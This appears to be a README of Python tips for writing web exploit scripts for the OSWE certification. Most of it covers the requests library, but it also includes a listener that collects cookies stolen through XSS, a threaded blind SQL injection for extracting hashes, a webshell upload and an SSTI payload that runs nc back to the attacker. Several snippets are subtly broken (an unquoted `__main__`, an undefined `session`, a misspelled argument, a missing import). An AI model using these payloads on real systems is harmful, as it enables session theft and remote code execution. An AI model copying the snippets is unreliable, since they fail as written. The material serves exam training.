This repository contains a list of useful snippets and tips that pertain to the writing of exploit scripts in the OSWE labs and certification exam.
Some examples here may go against certain coding practices, but our end goal is to write the exploit script fast and correct.
The Code Snippets section is a great place to start if you are not experienced in using the
requests
library or are new to Python. Otherwise, feel free to skip to the Reusable Code section or the Tips section.
- While there are many write-ups, reviews, and notes on the certification, few resources specifically focus on the process of writing exploits.
- Writing the exploit script can be daunting, especially for those who are new to Python or have little experience interacting with web applications through code.
- Time spent on identifying vulnerabilities and documenting an exam report can fluctuate considerably, but the time spent on developing the exploit script can be minimized and kept constant if mastered well.
- Exploit Writing for OSWE
- Background
- Table of Contents
- Code Snippets
- Starting Template
- Useful imports
- Using the
requests
library- Sending the simplest HTTP request
- Specifying different HTTP methods
- Reading the HTTP response
- Sending data as a query string in the URL (Using
params
argument) - Sending data as a query string in the body (Using
data
argument) - Sending data as a JSON in the body (Using
json
argument) - Sending a file in the body (Using
files
argument) - Setting HTTP headers (Using
headers
argument) - Setting HTTP cookies (Using
cookies
argument) - Disabling following of
3XX
redirects (Usingallow_redirects
argument) - Interacting with an unverified HTTPS server (Using
verify
argument) - Sending request through a HTTP proxy (Using
proxies
argument) - Creating a
Session
- Setting persistent cookies
- Setting persistent headers
- Troubleshooting
- Reusable code
- Tips
- Perform a sanity check after every HTTP request using
assert
- Print meaning messages after each step
- Separate each exploitation step into its own function
- Create a global
Session
object so it does not need to be explictly passed to each function call - Create a global
BASE_URL
string and construct the required URLs from it - To force all HTTP requests to go through Burp Suite without the use of the
proxies
argument , set theHTTP_PROXY
/HTTPS_PROXY
environment variable when running - Apply encoding/decoding scheme(s) to enable safe transmission of payloads
- Use
"""
to create the payload string if it contains both single ('
) and double quotes ("
) - Speed up SQL injections using multithreading
- Hardcode an authenticated user's cookie when developing exploits for authenticated features
- Avoid using f-strings (
f""
) orstr.format
if the payload contains too many curly braces ({}
)
- Perform a sanity check after every HTTP request using
import requests
def main():
print("Hello World!")
if __name__ == __main__:
main()
# For sending HTTP requests
import requests
# For Base64 encoding/decoding
from base64 import b64encode, b64decode, urlsafe_b64encode, urlsafe_b64decode
# For getting current time or for calculating time delays
from time import time
# For regular expressions
import re
# For running shell commands
import subprocess
# For multithreading
from concurrent.futures import ThreadPoolExecutor
# For running a HTTP server in the background
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
# For parsing HTTP cookies
from http import cookies
# For getting command-line arguments
import sys
resp_obj = requests.get("https://github.com")
# GET method
requests.get("https://github.com")
# POST method
requests.post("https://github.com")
# PUT method
requests.put("https://github.com")
# PATCH method
requests.patch("https://github.com")
# DELETE method
requests.delete("https://github.com")
resp_obj = requests.get("https://github.com")
# HTTP status code (e.g 404, 500, 301)
resp_obj.status_code
# HTTP response headers (e.g Location, Content-Disposition)
resp_obj.headers["Location"]
# Body as bytes
resp_obj.content
# Body as a string
resp_obj.text
# Body as a dictionary (if body is a JSON)
resp_obj.json()
params = {
"foo": "bar"
}
requests.get("https://github.com", params=params)
data = {
"foo": "bar"
}
requests.post("https://github.com", data=data)
data = {
"foo": "bar"
}
requests.post("https://github.com", json=data)
files = {
# (FILE_NAME, FILE_CONTENTS, FILE_MIMETYPE)
"uploaded_file": ("phpinfo.php", b"<?php phpinfo() ?>", "application/x-httpd-php")
}
requests.post("https://github.com", files=files)
headers = {
"X-Forwarded-For": "127.0.0.1"
}
requests.get("https://github.com", headers=headers)
cookies = {
"PHPSESSID": "fakesession"
}
requests.get("https://github.com", cookies=cookies)
requests.post("https://github.com/login", allow_redirects=False)
# Supresses InsecureRequestWarning messages
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
requests.get("https://github.com", verify=False)
proxies = {
"HTTP": "http://127.0.0.1:8080",
"HTTPS": "http://127.0.0.1:8080"
}
requests.get("https://github.com", proxies=proxies)
session = requests.Session()
session.get("https://github.com")
session = requests.Session()
session.cookies.update({"PHPSESSID": "fakesession"})
session = requests.Session()
session.headers["Authorization"] = "Basic 123"
- Open Wireshark
- Select the VPN interface (e.g
tun0
) - Enter
http
into the filter bar.
data = {
"foo": "bar"
}
resp_obj = requests.post("https://github.com", data=data)
prepared_request = resp_obj.request
print("Method:\n", prepared_request.method)
print()
print("URL:\n", prepared_request.url)
print()
print("Headers:\n", prepared_request.headers)
print()
print("Body:\n", prepared_request.body)
- Open Burp Suite
- Navigate to "Proxy" Tab and set "Intercept" to "On".
LHOST = "10.0.0.1"
WEB_PORT = 8000
JS_PAYLOAD = "<script>alert(1)</script>"
def start_web_server():
class MyHandler(BaseHTTPRequestHandler):
# Uncomment this method to suppress HTTP logs
# def log_message(self, format, *args):
# return
def do_GET(self):
if self.path.endswith('/payload.js'):
self.send_response(200)
self.send_header("Content-Type", "application/javascript")
self.send_header("Content-Length", str(len(JS_PAYLOAD)))
self.end_headers()
self.wfile.write(JS_PAYLOAD.encode())
httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
threading.Thread(target=httpd.serve_forever).start()
start_web_server()
LHOST = "10.0.0.1"
WEB_PORT = 8000
requests = requests.Session()
xss_event = threading.Event() # Signifies when victim sends their cookie
def send_xss_payload():
pass
def start_web_server():
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
# Load stolen cookie into session
_, enc_cookie = self.path.split("/?cookie=", 1)
plain_cookie = urlsafe_b64decode(enc_cookie).decode()
session.cookies["PHPSESSID"] = cookies.SimpleCookie(plain_cookie)["PHPSESSID"]
xss_event.set() # Trigger the event
httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
threading.Thread(target=httpd.serve_forever).start()
start_web_server()
send_xss_payload()
xss_event.wait() # Wait for event to be triggered
print("[+] Stolen cookie:", session.cookies["PHPSESSID"])
MAX_WORKERS = 20
HASH_LENGTH = 32
def exfiltrate_hash():
def boolean_sqli(arguments):
idx, ascii_val = arguments
# ...
# Perform SQLi and store boolean outcome into truth
# ...
return ascii_val, truth
result = ""
# Go through each character position
for idx in range(HASH_LENGTH):
# Use MAX_WORKERS threads to test possible ASCII values in parallel
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
# Pass each of (0, 32), (0, 33) ..., (0, 126) as an argument to boolean_sqli()
responses = executor.map(boolean_sqli, [(idx, ascii_val) for ascii_val in range(32, 126)])
# Go through each response and determine which ASCII value is correct
for ascii_val, truth in responses:
if truth:
result += chr(ascii_val)
break
return result
hash = exfiltrate_hash()
- Catch whether a webshell is indeed uploaded before attempting to trigger it
- Catch whether authentication is sucessful before exploiting authenticated features
Example:
# Suppose 302 is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data, allow_redirect=False)
assert resp_obj.status_code == 302, "Login not successful"
# Suppose admin page is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data)
assert "Admin Dashboard" in resp_obj.content, "Login not successful"
- Action being started/finished OR
- Cookies/tokens/files/values that were retrieved
Example:
[+] Parsed command-line arguments and got:
* BASE_URL: http://example.com
* LHOST: 127.0.0.1
* LPORT: 1337
[+] Triggered password reset token generation
[=] Getting password reset token length...
[+] Got password reset token length: 10
[=] Retrieving password reset token...
[+] Got password reset token: FAKE_TOKEN
Example:
def register():
pass
def login():
pass
def rce():
pass
session = requests.Session()
def login():
session.post(...)
def rce():
session.post(...)
BASE_URL = ""
session = requests.Session()
def login():
url = BASE_URL + "/login"
session.post(url, ...)
def rce():
url = BASE_URL + "/rce"
session.post(url, ...)
def main():
# Allow BASE_URL to be modified
global BASE_URL
BASE_URL = sys.argv[1]
...
To force all HTTP requests to go through Burp Suite without the use of the proxies
argument , set the HTTP_PROXY
/ HTTPS_PROXY
environment variable when running
$ HTTP_PROXY=http://127.0.0.1:8080 python3 poc.py
- Base64
- Hexadecimal
Example:
payload = """This is a '. This is a "."""
Especially if a lot of time-consuming steps had to be done to obtain an authenticated session
Example:
session = requests.Session()
def main():
# Skipping these for now...
# register()
# login()
# TODO: Delete this line after you are
# done developing and uncomment the above steps!
session.cookies["JSESSIONID"] = "ADMIN_COOKIE"
# Exploit authenticated features...
...
Doubling each curly brace just to escape them can be troublesome and error-prone. Instead use simple placeholders and do a .replace()
!
Example:
# Too many curly braces
ssti_payload = f"{{{{ __import__('os').system('nc {LHOST} {LPORT}') }}}}"
# Much easier to read
ssti_payload = "{{ __import__('os').system('nc <LHOST> <LPORT>') }}"\
.replace("<LHOST>", LHOST)\
.replace("<LPORT>", LPORT)